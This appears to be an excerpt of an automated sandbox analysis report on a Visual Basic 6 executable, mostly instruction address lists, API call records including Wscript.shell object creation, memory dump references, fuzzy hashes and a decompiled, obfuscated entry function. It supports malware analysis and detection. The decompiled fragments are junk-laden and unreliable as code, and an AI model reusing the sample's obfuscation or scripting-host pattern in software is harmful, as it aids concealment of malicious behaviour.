0x0041956f
0x00419576
0x00419592
0x00419592
0x00419592
0x00419578
0x00419578
0x0041957d
0x00419582
0x00419585
0x00419588
0x0041958d
0x0041958d
0x00419596
0x0041959d
0x004195a0
0x004195a3
0x004195ad
0x004195b7
0x004195bd
0x004195c3
0x004195af
0x004195af
0x004195af
0x004195c8
0x004195cd
0x004195d0
0x004195d3
0x004195d6
0x00000000
0x00000000
0x004195dc
0x004195eb
0x004195f1
0x004195f8
0x00419614
0x00419614
0x00419614
0x004195fa
0x004195fa
0x004195ff
0x00419604
0x00419607
0x0041960a
0x0041960f
0x0041960f
0x0041961f
0x00419623
0x00419625
0x0041962d
0x0041962e
0x00419633
0x00419636
0x00419637
0x0041963c
0x0041963d
0x00419640
0x00419641
0x00419649
0x0041964e
0x00419655
0x00419655
0x00419657
0x00419657
0x00419658
0x00419658
0x00419660
0x00419660
0x00419666
0x00419667
0x00419668
0x00419669
0x00419621
0x00000000
0x00419621
0x00000000
0x0041961f
0x00419695
0x0041969d
0x004196ac
0x004196b8
0x004196c0
0x004196c3
0x004196ca
0x004196d9
0x004196dc
0x004196de
0x004196e6
0x004196e7
0x004196ec
0x004196f3
0x004196fa
0x00419701
0x0041970b
0x0041970f
0x00419710
0x00419713
0x00419714
0x00419717
0x00419719
0x0041971a
0x0041971b
0x0041971e
0x00419720
0x00419721
0x00419722
0x00419725
0x0041972a
0x0041972f
0x00419735
0x00419737
0x00419738
0x00419746
0x00419746
0x00419746
0x0041973a
0x0041973a
0x0041973a
0x00419755
0x0041975f
0x00419763
0x00419764
0x00419766
0x0041976e
0x00419775
0x00419777
0x0041977d
0x00419784
0x0041978b
0x00419796
0x0041979b
0x0041978d
0x0041978d
0x0041978d
0x004197a1
0x004197aa
0x004197b1
0x004197bb
0x004197c2
0x004197cd
0x004197d2
0x004197c4
0x004197c4
0x004197c4
0x004197d8
0x004197e1
0x004197e8
0x004197f2
0x004197f9
0x00419804
0x00419809
0x004197fb
0x004197fb
0x004197fb
0x0041980f
0x00419818
0x0041981f
0x00419829
0x00419830
0x0041983b
0x00419840
0x00419832
0x00419832
0x00419832
0x00419846
0x0041984f
0x00419856
0x00419860
0x00419867
0x00419872
0x00419877
0x00419869
0x00419869
0x00419869
0x0041987d
0x00419886
0x0041988d
0x00419897
0x0041989e
0x004198a9
0x004198ae
0x004198a0
0x004198a0
0x004198a0
0x004198b4
0x004198bd
0x004198c4
0x004198ce
0x004198d5
0x004198e0
0x004198e5
0x004198d7
0x004198d7
0x004198d7
0x004198eb
0x004198f4
0x004198fb
0x00419905
0x0041990c
0x00419917
0x0041991c
0x0041990e
0x0041990e
0x0041990e
0x00419922
0x0041992b
0x00419932
0x0041993c
0x00419943
0x0041994e
0x00419953
0x00419945
0x00419945
0x00419945
0x00419959
0x00419962
0x00419969
0x00419973
0x0041997a
0x00419985
0x0041998a
0x0041997c
0x0041997c
0x0041997c
0x00419990
0x00419999
0x004199a0
0x004199aa
0x004199b1
0x004199bc
0x004199c1
0x004199b3
0x004199b3
0x004199b3
0x004199c7
0x004199d0
0x004199d7
0x004199e1
0x004199e8
0x004199f3
0x004199f8
0x004199ea
0x004199ea
0x004199ea
0x004199fe
0x00419a07
0x00419a0e
0x00419a18
0x00419a1f
0x00419a2a
0x00419a2f
0x00419a21
0x00419a21
0x00419a21
0x00419a35
0x00419a3e
0x00419a45
0x00419a4f
0x00419a56
0x00419a61
0x00419a66
0x00419a58
0x00419a58
0x00419a58
0x00419a6c
0x00419a75
0x00419a7c
0x00419a86
0x00419a8d
0x00419a98
0x00419a9d
0x00419a8f
0x00419a8f
0x00419a8f
0x00419aa3
0x00419aac
0x00419ab3
0x00419abd
0x00419ac4
0x00419acf
0x00419ad4
0x00419ac6
0x00419ac6
0x00419ac6
0x00419ada
0x00419ae3
0x00419aea
0x00419af4
0x00419afb
0x00419b06
0x00419b0b
0x00419afd
0x00419afd
0x00419afd
0x00419b11
0x00419b1a
0x00419b21
0x00419b2b
0x00419b32
0x00419b3d
0x00419b42
0x00419b34
0x00419b34
0x00419b34
0x00419b48
0x00419b51
0x00419b58
0x00419b62
0x00419b69
0x00419b74
0x00419b79
0x00419b6b
0x00419b6b
0x00419b6b
0x00419b7f
0x00419b88
0x00419b8f
0x00419b99
0x00419ba0
0x00419bab
0x00419bb0
0x00419ba2
0x00419ba2
0x00419ba2
0x00419bb6
0x00419bbf
0x00419bc6
0x00419bd0
0x00419bd7
0x00419be2
0x00419be7
0x00419bd9
0x00419bd9
0x00419bd9
0x00419bed
0x00419bf6
0x00419bfd
0x00419c07
0x00419c0e
0x00419c19
0x00419c1e
0x00419c10
0x00419c10
0x00419c10
0x00419c24
0x00419c2d
0x00419c34
0x00419c3e
0x00419c45
0x00419c50
0x00419c55
0x00419c47
0x00419c47
0x00419c47
0x00419c5b
0x00419c64
0x00419c6b
0x00419c75
0x00419c7c
0x00419c87
0x00419c8c
0x00419c7e
0x00419c7e
0x00419c7e
0x00419c92
0x00419c9b
0x00419ca2
0x00419cac
0x00419cb3
0x00419cbe
0x00419cc3
0x00419cb5
0x00419cb5
0x00419cb5
0x00419cc9
0x00419cd2
0x00419cd9
0x00419ce3
0x00419cea
0x00419cf5
0x00419cfa
0x00419cec
0x00419cec
0x00419cec
0x00419d00
0x00419d09
0x00419d10
0x00419d1a
0x00419d21
0x00419d2c
0x00419d31
0x00419d23
0x00419d23
0x00419d23
0x00419d37
0x00419d40
0x00419d47
0x00419d51
0x00419d58
0x00419d63
0x00419d68
0x00419d5a
0x00419d5a
0x00419d5a
0x00419d6e
0x00419d77
0x00419d7e
0x00419d88
0x00419d8f
0x00419d9a
0x00419d9f
0x00419d91
0x00419d91
0x00419d91
0x00419da5
0x00419dae
0x00419db5
0x00419dbf
0x00419dc6
0x00419dd1
0x00419dd6
0x00419dc8
0x00419dc8
0x00419dc8
0x00419ddc
0x00419de5
0x00419dec
0x00419df6
0x00419dfd
0x00419e08
0x00419e0d
0x00419dff
0x00419dff
0x00419dff
0x00419e13
0x00419e1c
0x00419e23
0x00419e2d
0x00419e34
0x00419e3f
0x00419e44
0x00419e36
0x00419e36
0x00419e36
0x00419e4a
0x00419e53
0x00419e5a
0x00419e64
0x00419e6b
0x00419e76
0x00419e7b
0x00419e6d
0x00419e6d
0x00419e6d
0x00419e81
0x00419e8a
0x00419e91
0x00419e9b
0x00419ea2
0x00419ead
0x00419eb2
0x00419ea4
0x00419ea4
0x00419ea4
0x00419eb8
0x00419ec1
0x00419ec8
0x00419ed2
0x00419ed9
0x00419ee4
0x00419ee9
0x00419edb
0x00419edb
0x00419edb
0x00419eef
0x00419ef8
0x00419eff
0x00419f09
0x00419f10
0x00419f1b
0x00419f20
0x00419f12
0x00419f12
0x00419f12
0x00419f26
0x00419f2f
0x00419f36
0x00419f40
0x00419f47
0x00419f52
0x00419f57
0x00419f49
0x00419f49
0x00419f49
0x00419f5d
0x00419f66
0x00419f6d
0x00419f77
0x00419f7e
0x00419f89
0x00419f8e
0x00419f80
0x00419f80
0x00419f80
0x00419f94
0x00419f9d
0x00419fa4
0x00419fae
0x00419fb5
0x00419fc0
0x00419fc5
0x00419fb7
0x00419fb7
0x00419fb7
0x00419fcb
0x00419fd4
0x00419fdb
0x00419fe5
0x00419fec
0x00419ff7
0x00419ffc
0x00419fee
0x00419fee
0x00419fee
0x0041a002
0x0041a00b
0x0041a012
0x0041a01c
0x0041a023
0x0041a02e
0x0041a033
0x0041a025
0x0041a025
0x0041a025
0x0041a039
0x0041a042
0x0041a049
0x0041a053
0x0041a05a
0x0041a065
0x0041a06a
0x0041a05c
0x0041a05c
0x0041a05c
0x0041a070
0x0041a079
0x0041a080
0x0041a08a
0x0041a091
0x0041a09c
0x0041a0a1
0x0041a093
0x0041a093
0x0041a093
0x0041a0a7
0x0041a0b0
0x0041a0b7
0x0041a0c1
0x0041a0c8
0x0041a0d3
0x0041a0d8
0x0041a0ca
0x0041a0ca
0x0041a0ca
0x0041a0de
0x0041a0e7
0x0041a0ee
0x0041a0f8
0x0041a0ff
0x0041a10a
0x0041a10f
0x0041a101
0x0041a101
0x0041a101
0x0041a115
0x0041a11e
0x0041a125
0x0041a12f
0x0041a136
0x0041a141
0x0041a146
0x0041a138
0x0041a138
0x0041a138
0x0041a14c
0x0041a155
0x0041a15c
0x0041a166
0x0041a16d
0x0041a178
0x0041a17d
0x0041a16f
0x0041a16f
0x0041a16f
0x0041a183
0x0041a18c
0x0041a193
0x0041a19d
0x0041a1a4
0x0041a1af
0x0041a1b4
0x0041a1a6
0x0041a1a6
0x0041a1a6
0x0041a1ba
0x0041a1c3
0x0041a1ca
0x0041a1d4
0x0041a1db
0x0041a1e6
0x0041a1eb
0x0041a1dd
0x0041a1dd
0x0041a1dd
0x0041a1f1
0x0041a1fa
0x0041a201
0x0041a20b
0x0041a212
0x0041a21d
0x0041a222
0x0041a214
0x0041a214
0x0041a214
0x0041a228
0x0041a231
0x0041a238
0x0041a242
0x0041a249
0x0041a254
0x0041a259
0x0041a24b
0x0041a24b
0x0041a24b
0x0041a25f
0x0041a268
0x0041a26f
0x0041a279
0x0041a280
0x0041a28b
0x0041a290
0x0041a282
0x0041a282
0x0041a282
0x0041a296
0x0041a29f
0x0041a2a6
0x0041a2b0
0x0041a2b7
0x0041a2c2
0x0041a2c7
0x0041a2b9
0x0041a2b9
0x0041a2b9
0x0041a2cd
0x0041a2d6
0x0041a2dd
0x0041a2e7
0x0041a2ee
0x0041a2f9
0x0041a2fe
0x0041a2f0
0x0041a2f0
0x0041a2f0
0x0041a304
0x0041a30d
0x0041a314
0x0041a31e
0x0041a325
0x0041a330
0x0041a335
0x0041a327
0x0041a327
0x0041a327
0x0041a33b
0x0041a344
0x0041a34b
0x0041a355
0x0041a35c
0x0041a367
0x0041a36c
0x0041a35e
0x0041a35e
0x0041a35e
0x0041a372
0x0041a37b
0x0041a382
0x0041a38c
0x0041a393
0x0041a39e
0x0041a3a3
0x0041a395
0x0041a395
0x0041a395
0x0041a3a9
0x0041a3b2
0x0041a3b9
0x0041a3c3
0x0041a3ca
0x0041a3d5
0x0041a3da
0x0041a3cc
0x0041a3cc
0x0041a3cc
0x0041a3e0
0x0041a3e9
0x0041a3f0
0x0041a3fa
0x0041a401
0x0041a40c
0x0041a411
0x0041a403
0x0041a403
0x0041a403
0x0041a417
0x0041a420
0x0041a427
0x0041a431
0x0041a438
0x0041a443
0x0041a448
0x0041a43a
0x0041a43a
0x0041a43a
0x0041a44e
0x0041a457
0x0041a45e
0x0041a468
0x0041a46f
0x0041a47a
0x0041a47f
0x0041a471
0x0041a471
0x0041a471
0x0041a485
0x0041a48e
0x0041a495
0x0041a49f
0x0041a4a6
0x0041a4b1
0x0041a4b6
0x0041a4a8
0x0041a4a8
0x0041a4a8
0x0041a4bc
0x0041a4c5
0x0041a4cc
0x0041a4d6
0x0041a4dd
0x0041a4e8
0x0041a4ed
0x0041a4df
0x0041a4df
0x0041a4df
0x0041a4f3
0x0041a4fc
0x0041a503
0x0041a50d
0x0041a514
0x0041a51f
0x0041a524
0x0041a516
0x0041a516
0x0041a516
0x0041a52a
0x0041a533
0x0041a53a
0x0041a544
0x0041a54b
0x0041a556
0x0041a55b
0x0041a54d
0x0041a54d
0x0041a54d
0x0041a561
0x0041a56a
0x0041a571
0x0041a57b
0x0041a582
0x0041a58d
0x0041a592
0x0041a584
0x0041a584
0x0041a584
0x0041a598
0x0041a5a1
0x0041a5a8
0x0041a5b2
0x0041a5b9
0x0041a5c4
0x0041a5c9
0x0041a5bb
0x0041a5bb
0x0041a5bb
0x0041a5cf
0x0041a5d8
0x0041a5df
0x0041a5e9
0x0041a5f0
0x0041a5fb
0x0041a600
0x0041a5f2
0x0041a5f2
0x0041a5f2
0x0041a606
0x0041a60f
0x0041a616
0x0041a620
0x0041a627
0x0041a632
0x0041a637
0x0041a629
0x0041a629
0x0041a629
0x0041a63d
0x0041a646
0x0041a64d
0x0041a657
0x0041a65e
0x0041a669
0x0041a66e
0x0041a660
0x0041a660
0x0041a660
0x0041a674
0x0041a67d
0x0041a684
0x0041a68e
0x0041a695
0x0041a6a0
0x0041a6a5
0x0041a697
0x0041a697
0x0041a697
0x0041a6ab
0x0041a6b4
0x0041a6bb
0x0041a6c5
0x0041a6cc
0x0041a6d7
0x0041a6dc
0x0041a6ce
0x0041a6ce
0x0041a6ce
0x0041a6e2
0x0041a6eb
0x0041a6f2
0x0041a6fc
0x0041a703
0x0041a70e
0x0041a713
0x0041a705
0x0041a705
0x0041a705
0x0041a719
0x0041a722
0x0041a729
0x0041a733
0x0041a73a
0x0041a745
0x0041a74a
0x0041a73c
0x0041a73c
0x0041a73c
0x0041a750
0x0041a759
0x0041a760
0x0041a76a
0x0041a771
0x0041a77c
0x0041a781
0x0041a773
0x0041a773
0x0041a773
0x0041a787
0x0041a790
0x0041a797
0x0041a7a1
0x0041a7a8
0x0041a7b3
0x0041a7b8
0x0041a7aa
0x0041a7aa
0x0041a7aa
0x0041a7be
0x0041a7c7
0x0041a7ce
0x0041a7d8
0x0041a7df
0x0041a7ea
0x0041a7ef
0x0041a7e1
0x0041a7e1
0x0041a7e1
0x0041a7f5
0x0041a7fe
0x0041a805
0x0041a80f
0x0041a816
0x0041a821
0x0041a826
0x0041a818
0x0041a818
0x0041a818
0x0041a82c
0x0041a835
0x0041a83c
0x0041a846
0x0041a84d
0x0041a858
0x0041a85d
0x0041a84f
0x0041a84f
0x0041a84f
0x0041a863
0x0041a86c
0x0041a873
0x0041a87d
0x0041a884
0x0041a88f
0x0041a894
0x0041a886
0x0041a886
0x0041a886
0x0041a89a
0x0041a8a3
0x0041a8aa
0x0041a8b4
0x0041a8bb
0x0041a8c6
0x0041a8cb
0x0041a8bd
0x0041a8bd
0x0041a8bd
0x0041a8d1
0x0041a8da
0x0041a8e1
0x0041a8eb
0x0041a8f2
0x0041a8fd
0x0041a902
0x0041a8f4
0x0041a8f4
0x0041a8f4
0x0041a908
0x0041a911
0x0041a918
0x0041a922
0x0041a929
0x0041a934
0x0041a939
0x0041a92b
0x0041a92b
0x0041a92b
0x0041a93f
0x0041a948
0x0041a94f
0x0041a959
0x0041a960
0x0041a96b
0x0041a970
0x0041a962
0x0041a962
0x0041a962
0x0041a976
0x0041a97f
0x0041a986
0x0041a990
0x0041a997
0x0041a9a2
0x0041a9a7
0x0041a999
0x0041a999
0x0041a999
0x0041a9ad
0x0041a9b6
0x0041a9bd
0x0041a9c7
0x0041a9ce
0x0041a9d9
0x0041a9de
0x0041a9d0
0x0041a9d0
0x0041a9d0
0x0041a9e4
0x0041a9ed
0x0041a9f4
0x0041a9fe
0x0041aa05
0x0041aa10
0x0041aa15
0x0041aa07
0x0041aa07
0x0041aa07
0x0041aa1b
0x0041aa24
0x0041aa2b
0x0041aa35
0x0041aa3c
0x0041aa47
0x0041aa4c
0x0041aa3e
0x0041aa3e
0x0041aa3e
0x0041aa52
0x0041aa5b
0x0041aa62
0x0041aa6c
0x0041aa73
0x0041aa7e
0x0041aa83
0x0041aa75
0x0041aa75
0x0041aa75
0x0041aa89
0x0041aa92
0x0041aa99
0x0041aaa3
0x0041aaaa
0x0041aab5
0x0041aaba
0x0041aaac
0x0041aaac
0x0041aaac
0x0041aac0
0x0041aac9
0x0041aad0
0x0041aada
0x0041aae1
0x0041aaec
0x0041aaf1
0x0041aae3
0x0041aae3
0x0041aae3
0x0041aaf7
0x0041ab00
0x0041ab07
0x0041ab11
0x0041ab18
0x0041ab23
0x0041ab28
0x0041ab1a
0x0041ab1a
0x0041ab1a
0x0041ab2e
0x0041ab37
0x0041ab3e
0x0041ab48
0x0041ab4f
0x0041ab5a
0x0041ab5f
0x0041ab51
0x0041ab51
0x0041ab51
0x0041ab65
0x0041ab6e
0x0041ab75
0x0041ab7f
0x0041ab86
0x0041ab91
0x0041ab96
0x0041ab88
0x0041ab88
0x0041ab88
0x0041ab9c
0x0041aba5
0x0041abac
0x0041abb6
0x0041abbd
0x0041abc8
0x0041abcd
0x0041abbf
0x0041abbf
0x0041abbf
0x0041abd3
0x0041abdc
0x0041abe3
0x0041abed
0x0041abf4
0x0041abff
0x0041ac04
0x0041abf6
0x0041abf6
0x0041abf6
0x0041ac0a
0x0041ac13
0x0041ac1a
0x0041ac24
0x0041ac2b
0x0041ac36
0x0041ac3b
0x0041ac2d
0x0041ac2d
0x0041ac2d
0x0041ac41
0x0041ac4a
0x0041ac51
0x0041ac5b
0x0041ac62
0x0041ac6d
0x0041ac72
0x0041ac64
0x0041ac64
0x0041ac64
0x0041ac78
0x0041ac81
0x0041ac88
0x0041ac92
0x0041ac99
0x0041aca4
0x0041aca9
0x0041ac9b
0x0041ac9b
0x0041ac9b
0x0041acaf
0x0041acb8
0x0041acbf
0x0041acc9
0x0041acd0
0x0041acdb
0x0041ace0
0x0041acd2
0x0041acd2
0x0041acd2
0x0041ace6
0x0041acef
0x0041acf6
0x0041ad00
0x0041ad07
0x0041ad12
0x0041ad17
0x0041ad09
0x0041ad09
0x0041ad09
0x0041ad1d
0x0041ad26
0x0041ad2d
0x0041ad37
0x0041ad3e
0x0041ad49
0x0041ad4e
0x0041ad40
0x0041ad40
0x0041ad40
0x0041ad54
0x0041ad5d
0x0041ad64
0x0041ad6e
0x0041ad75
0x0041ad80
0x0041ad85
0x0041ad77
0x0041ad77
0x0041ad77
0x0041ad8b
0x0041ad94
0x0041ad9b
0x0041ada5
0x0041adac
0x0041adb7
0x0041adbc
0x0041adae
0x0041adae
0x0041adae
0x0041adc2
0x0041adcb
0x0041add2
0x0041addc
0x0041ade3
0x0041adee
0x0041adf3
0x0041ade5
0x0041ade5
0x0041ade5
0x0041adf9
0x0041ae02
0x0041ae09
0x0041ae13
0x0041ae1a
0x0041ae25
0x0041ae2a
0x0041ae1c
0x0041ae1c
0x0041ae1c
0x0041ae30
0x0041ae39
0x0041ae40
0x0041ae4a
0x0041ae51
0x0041ae5c
0x0041ae61
0x0041ae53
0x0041ae53
0x0041ae53
0x0041ae67
0x0041ae70
0x0041ae77
0x0041ae81
0x0041ae88
0x0041ae93
0x0041ae98
0x0041ae8a
0x0041ae8a
0x0041ae8a
0x0041ae9e
0x0041aea7
0x0041aeae
0x0041aeb8
0x0041aebf
0x0041aeca
0x0041aecf
0x0041aec1
0x0041aec1
0x0041aec1
0x0041aed5
0x0041aede
0x0041aee5
0x0041aeef
0x0041aef6
0x0041af01
0x0041af06
0x0041aef8
0x0041aef8
0x0041aef8
0x0041af0c
0x0041af15
0x0041af1c
0x0041af26
0x0041af2d
0x0041af38
0x0041af3d
0x0041af2f
0x0041af2f
0x0041af2f
0x0041af43
0x0041af4c
0x0041af53
0x0041af5d
0x0041af64
0x0041af6f
0x0041af74
0x0041af66
0x0041af66
0x0041af66
0x0041af7a
0x0041af83
0x0041af8a
0x0041af94
0x0041af9b
0x0041afa6
0x0041afab
0x0041af9d
0x0041af9d
0x0041af9d
0x0041afb1
0x0041afba
0x0041afc1
0x0041afcb
0x0041afd2
0x0041afdd
0x0041afe2
0x0041afd4
0x0041afd4
0x0041afd4
0x0041afe8
0x0041aff1
0x0041aff8
0x0041b002
0x0041b009
0x0041b014
0x0041b019
0x0041b00b
0x0041b00b
0x0041b00b
0x0041b01f
0x0041b028
0x0041b02f
0x0041b039
0x0041b040
0x0041b04b
0x0041b050
0x0041b042
0x0041b042
0x0041b042
0x0041b056
0x0041b05f
0x0041b066
0x0041b070
0x0041b077
0x0041b082
0x0041b087
0x0041b079
0x0041b079
0x0041b079
0x0041b096
0x0041b09d
0x0041b0a4
0x0041b0ab
0x0041b0b0
0x0041b0b1
0x0041b0bb
0x0041b0c3
0x0041b0c8
0x0041b0cf
0x0041b0ec
0x0041b0d1
0x0041b0d1
0x0041b0d6
0x0041b0db
0x0041b0e0
0x0041b0e0
0x0041b0fe
0x0041b116
0x0041b119
0x0041b11b
0x0041b121
0x0041b128
0x0041b14a
0x0041b14a
0x0041b14a
0x0041b12a
0x0041b12a
0x0041b12c
0x0041b131
0x0041b137
0x0041b13d
0x0041b142
0x0041b142
0x0041b154
0x0041b168
0x0041b16b
0x0041b16d
0x0041b173
0x0041b17a
0x0041b19c
0x0041b19c
0x0041b19c
0x0041b17c
0x0041b17c
0x0041b17e
0x0041b183
0x0041b189
0x0041b18f
0x0041b194
0x0041b194
0x0041b1a6
0x0041b1ab
0x0041b1b2
0x0041b1cf
0x0041b1b4
0x0041b1b4
0x0041b1b9
0x0041b1be
0x0041b1c3
0x0041b1c3
0x0041b1e1
0x0041b1f9
0x0041b1fc
0x0041b1fe
0x0041b204
0x0041b20b
0x0041b22d
0x0041b22d
0x0041b22d
0x0041b20d
0x0041b20d
0x0041b20f
0x0041b214
0x0041b21a
0x0041b220
0x0041b225
0x0041b225
0x0041b237
0x0041b24b
0x0041b24e
0x0041b250
0x0041b256
0x0041b25d
0x0041b27f
0x0041b27f
0x0041b27f
0x0041b25f
0x0041b25f
0x0041b261
0x0041b266
0x0041b26c
0x0041b272
0x0041b277
0x0041b277
0x0041b289
0x0041b289
0x0041b28e
0x0041b290
0x0041b295
0x0041b29f
0x0041b2a4
0x0041b2a5
0x0041b2aa
0x0041b2b1
0x0041b2b7
0x0041b2c1
0x0041b2cd
0x0041b2cf
0x0041b2d5
0x0041b2dc
0x0041b2f9
0x0041b2de
0x0041b2de
0x0041b2e3
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b30b
0x0041b323
0x0041b326
0x0041b328
0x0041b32e
0x0041b335
0x0041b357
0x0041b357
0x0041b357
0x0041b337
0x0041b337
0x0041b339
0x0041b33e
0x0041b344
0x0041b34a
0x0041b34f
0x0041b34f
0x0041b361
0x0041b37c
0x0041b382
0x0041b384
0x0041b38a
0x0041b391
0x0041b3b6
0x0041b3b6
0x0041b3b6
0x0041b393
0x0041b393
0x0041b398
0x0041b39d
0x0041b3a3
0x0041b3a9
0x0041b3ae
0x0041b3ae
0x0041b3c4
0x0041b3cb
0x0041b3d0
0x0041b3d7
0x0041b3f4
0x0041b3d9
0x0041b3d9
0x0041b3de
0x0041b3e3
0x0041b3e8
0x0041b3e8
0x0041b406
0x0041b41e
0x0041b421
0x0041b423
0x0041b429
0x0041b430
0x0041b452
0x0041b452
0x0041b452
0x0041b432
0x0041b432
0x0041b434
0x0041b439
0x0041b43f
0x0041b445
0x0041b44a
0x0041b44a
0x0041b45c
0x0041b477
0x0041b47d
0x0041b47f
0x0041b485
0x0041b48c
0x0041b4b1
0x0041b4b1
0x0041b4b1
0x0041b48e
0x0041b48e
0x0041b493
0x0041b498
0x0041b49e
0x0041b4a4
0x0041b4a9
0x0041b4a9
0x0041b4bf
0x0041b4c6
0x0041b4d1
0x0041b4db
0x0041b4ec
0x0041b4f9
0x0041b504
0x0041b50a
0x0041b50c
0x0041b512
0x0041b519
0x0041b53b
0x0041b53b
0x0041b53b
0x0041b51b
0x0041b51b
0x0041b520
0x0041b525
0x0041b528
0x0041b52e
0x0041b533
0x0041b533
0x0041b519
0x0041b542
0x0041b549
0x0041b566
0x0041b54b
0x0041b54b
0x0041b550
0x0041b555
0x0041b55a
0x0041b55a
0x0041b578
0x0041b590
0x0041b593
0x0041b595
0x0041b59b
0x0041b5a2
0x0041b5c4
0x0041b5c4
0x0041b5c4
0x0041b5a4
0x0041b5a4
0x0041b5a6
0x0041b5ab
0x0041b5b1
0x0041b5b7
0x0041b5bc
0x0041b5bc
0x0041b5ce
0x0041b5e9
0x0041b5ef
0x0041b5f1
0x0041b5f7
0x0041b5fe
0x0041b623
0x0041b623
0x0041b623
0x0041b600
0x0041b600
0x0041b605
0x0041b60a
0x0041b610
0x0041b616
0x0041b61b
0x0041b61b
0x0041b631
0x0041b638
0x0041b643
0x0041b646
0x0041b647
0x0041b674
0x0041b67c
0x0041b684
0x0041b68a
0x0041b690
0x0041b691
0x0041b693
0x0041b698
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 00419530
__vbaHresultCheckObj.MSVBVM60(00000000,00401108,00402DF0,000002B4), ref: 00419588
__vbaFpI4.MSVBVM60(00000000,00401108,00402DF0,000002B4), ref: 004195C8
__vbaHresultCheckObj.MSVBVM60(00000000,00401108,00402E20,000006F8), ref: 0041960A
#716.MSVBVM60(?,Wscript.shell,00000000), ref: 0041962E
__vbaObjVar.MSVBVM60(?,?,Wscript.shell,00000000), ref: 00419637
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419641
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419649

Strings

Wscript.shell, xrefs: 00419625
K, xrefs: 00402B34

Memory Dump Source

Source File: 00000006.00000002.677975339.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.677969190.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.678004875.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.678010345.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.678017234.0000000000422000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$#716AddrefChkstkFree
String ID: K$Wscript.shell
API String ID: 3553540440-4044529127
Opcode ID: 8c1230cdde65d5de72dcbb9a5c2c2211443223cd491d258afbfa0af0d5c4a469
Instruction ID: fd559a03e50e645fb8dedbf70b0c136a189ac89362fc6102b1331a4ce3a79994
Opcode Fuzzy Hash: 8c1230cdde65d5de72dcbb9a5c2c2211443223cd491d258afbfa0af0d5c4a469
Instruction Fuzzy Hash: E1411871800209FFCB01EFA5D989BEDBBB5FF04754F10802AF505BB2A1C77899918B98

Uniqueness

Uniqueness Score: -1.00%

Function 004014BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 68%

			_entry_() {
				signed int _t5;
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				void* _t11;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t18;

				_push("VB5!6%*"); // executed
				L004014B4(); // executed
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 ^ _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				asm("out 0x7b, eax");
				asm("adc ch, bh");
				_pop(es);
				_t16 = _t15 - 1;
				asm("stosb");
				_t18 = _t17 + 1;
				asm("stosd");
				 *_t5 =  *_t5 + _t11;
				asm("bound edx, [ebp+0xe9]");
				 *_t5 =  *_t5 + _t5;
				 *_t9 =  *_t9 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *((intOrPtr*)(_t5 + 0x41)) =  *((intOrPtr*)(_t5 + 0x41)) + _t11;
				_push(_t6);
				_push(_t7);
				_t8 = _t7 + 1;
				_t9 = _t9 + 2;
				_t18 = _t18 - 1;
				 *_t6 =  *_t6 + _t6;
				 *_t6 =  *_t6 + _t6;
				_t7 = _t8 + _t8;
				asm("int3");
				 *_t6 =  *_t6 ^ _t6;
				es = _t8;
				_t3 = _t6 + 0xe;
				_t4 = _t16;
				_t16 =  *_t3;
				 *_t3 = _t4;
				asm("sbb byte [edi], 0x43");
				_t5 =  *0x9e6bcf32;
				_t6 = _t5 &  &__imp__#100;
			}

0x004014bc
0x004014c1
0x004014c6
0x004014c8
0x004014ca
0x004014cc
0x004014ce
0x004014d2
0x004014d4
0x004014d6
0x004014d8
0x004014da
0x004014dc
0x004014dd
0x004014de
0x004014df
0x004014e0
0x004014e1
0x004014e5
0x004014eb
0x004014ed
0x004014ef
0x004014f1
0x004014f3
0x004014f5
0x004014f7
0x004014f8
0x004014fa
0x004014fb
0x004014fc
0x004014fd
0x004014ff
0x00401501
0x00401503
0x00401505
0x00401506
0x00401508
0x00401509
0x00401509
0x00401509
0x00401509
0x0040150e
0x00401511
0x004014b5

APIs

#100.MSVBVM60(VB5!6%*), ref: 004014C1

Strings

VB5!6%*, xrefs: 004014BC

Memory Dump Source

Source File: 00000006.00000002.677975339.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.677969190.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.678004875.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.678010345.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.678017234.0000000000422000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: c3ca8f00b04b4c6c8a07c6e4da5a284391b67ba2e22594c93d4e0a15af86cc83
Instruction ID: 3fb8302750a3caa5f6478e918fa1bb2a495d834504987d786d89a660ce1201af
Opcode Fuzzy Hash: c3ca8f00b04b4c6c8a07c6e4da5a284391b67ba2e22594c93d4e0a15af86cc83
Instruction Fuzzy Hash: 9B01506584E3C09ED3038B308C65A917FB48E43211B1E41EBCAC1EE0F3D66E094AC7A7

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00321248, Relevance: 9.2, Strings: 7, Instructions: 454COMMON

Download Yara Rule

Strings

Bi(K, xrefs: 0032193E
\Z, xrefs: 00321745
^, xrefs: 0032132F
w, xrefs: 0032144D
's, xrefs: 00321906
Ao, xrefs: 00321AC9
#Q, xrefs: 003213DB

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Bi(K$\Z$^$#Q$'s$Ao$w
